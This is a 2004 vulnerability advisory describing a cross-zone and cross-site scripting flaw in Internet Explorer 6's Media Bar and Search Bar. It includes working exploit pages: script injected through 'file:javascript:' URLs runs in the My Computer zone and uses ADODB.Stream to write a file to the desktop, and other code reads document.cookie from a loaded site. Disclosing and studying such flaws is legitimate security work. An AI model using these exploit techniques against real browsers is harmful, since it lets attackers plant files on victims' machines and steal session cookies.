|
######################################################################### Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability Release Date : Mar 3,2004 Application : Microsoft Internet Explorer Tested On : MS-IE 6.0(sp1) Vendor URL : http://www.microsoft.com/ie Author : Cheng Peng Su(apple_soup_at_msn.com) ######################################################################### [Proof of Concept] The code below is used for loading a URL into the HTML content area of the Media Bar window.open("http://www.google.com/","_media") And javascript also can be injected: window.open("javascript:alert(location.href)","_media") in my computer,the code above will show me a MsgBox says 'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm' it suggests you that it's executed in My Computer Zone. We can also inject a code to the Media Bar which has connected to a website. As Media Bar ,Search Bar has the same vuln. [Exploit] !YOU CAN FIND THE DOCUMENT AT !http://www.freewebs.com/applesoup/CrossBar/document.txt The code will use 'file:javascript:[script]' vuln which posted months ago.Maybe Microsoft has noticed the leak here,so i can't only use javascript-protocol in the code, and script-tag is filtered out ,so i have to inject the script into img-tag. I. In Media Bar 1 . Cross Zone Scripting Exploit ---------------------------CrossZone.htm--------------------------- <script> // '\\42' -> '\42' -> ' " ' img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);'; inject_html=""; window.open('file:javascript:document.write("' + inject_html + '")','_media'); </script> -------------------------------End--------------------------------- 2 . Cross Site Scripting Exploit ---------------------------CrossSite.htm--------------------------- <script> window.open("http://www.google.com/","_media") setTimeout(function(){ window.open("file:javascript:alert(document.cookie);","_media") },5000); </script> -------------------------------End--------------------------------- II. In Search Bar 1 . Cross Zone Scripting Exploit ---------------------------CrossZone.htm--------------------------- <script> window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page // cause it's in My Computer Zone. setTimeout(function(){ // '\\42' -> '\42' -> ' " ' img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);'; inject_html=""; window.open('file:javascript:document.write("' + inject_html + '")','_search'); },5000); </script> -------------------------------End--------------------------------- 2 . Cross Site Scripting Exploit ---------------------------CrossSite.htm--------------------------- <script> window.open("http://www.google.com/","_search") setTimeout(function(){ window.open("file:javascript:alert(document.cookie);","_search") },5000); </script> -------------------------------End--------------------------------- [Demo] Harmless demo: http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm [Contact] Cheng Peng Su Class 1,Senior 2,high school attached to Wuhan University Wuhan,Hubei,China(430072) apple_soup_at_msn.com